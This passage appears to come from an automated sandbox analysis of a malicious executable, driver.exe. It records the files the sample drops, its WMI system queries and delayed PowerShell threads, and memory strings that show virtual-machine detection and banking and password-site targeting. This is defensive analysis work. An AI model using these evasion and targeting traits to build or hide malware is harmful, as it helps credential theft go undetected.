Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\driver.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17566

Source: C:\Users\user\Desktop\driver.exe

API coverage: 6.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep count: 6258 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460	Thread sleep count: 292 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6388	Thread sleep count: 6357 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1120	Thread sleep count: 474 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712	Thread sleep count: 6117 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712	Thread sleep count: 203 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684	Thread sleep count: 1343 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep count: 5057 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904	Thread sleep count: 2549 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7692	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\SIHClient.exe TID: 8092	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412	Thread sleep count: 3381 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516	Thread sleep count: 1821 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep count: 4302 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408	Thread sleep count: 229 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5432	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472	Thread sleep count: 2594 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800	Thread sleep count: 891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep count: 3076 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep count: 1443 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6A29B83B0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29B92F0 FindFirstFileExW,FindClose,	0_2_00007FF6A29B92F0
Source: C:\Users\user\Desktop\driver.exe	Code function: 0_2_00007FF6A29D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6A29D18E4
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29B92F0 FindFirstFileExW,FindClose,	2_2_00007FF6A29B92F0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF6A29B83B0
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF6A29D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF6A29D18E4
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542646EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	77_2_00007FF7542646EC
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF7542A88E0 FindFirstFileExA,	77_2_00007FF7542A88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Code function: 77_2_00007FF75425E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	77_2_00007FF75425E21C

Source: C:\Users\user\Desktop\driver.exe

Code function: 2_2_00007FF8A8661240 GetSystemInfo,

2_2_00007FF8A8661240

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 1*fecodevmusrvc
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: svchost.exe, 00000030.00000002.3296783484.000002106B658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3294657376.000002106602B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E08000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000003.2218706079.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000002.2497855608.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000003.2220783237.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000002.2497855608.00000224C5213000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~Y
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: d8qemu-ga
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f1vmware
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: rar.exe, 0000004D.00000003.2348866044.0000014AD2546000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware)
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: rar.exe, 0000004D.00000003.2348866044.0000014AD2546000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 0000003B.00000002.2187892505.0000025388E14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2185038981.0000025388E14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2186016185.0000025388E14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"*Yx
Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Qf4vmsrvc
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: driver.exe, 00000002.00000002.2444747899.000001C0EF470000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2329743274.000001C0EEECE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-VmOW
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2185838643.0000025388E30000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2185838643.0000025388E30000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWA
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicerc
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: rar.exe, 0000004D.00000003.2348866044.0000014AD2546000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\driver.exe

Code function: 0_2_00007FF6A29BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6A29BD19C

Source: C:\Users\user\Desktop\driver.exe

Code function: 2_2_00007FF8A8030330 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FF8A8030330

Source: C:\Users\user\Desktop\driver.exe

Code function: 0_2_00007FF6A29D34F0 GetProcessHeap,

0_2_00007FF6A29D34F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
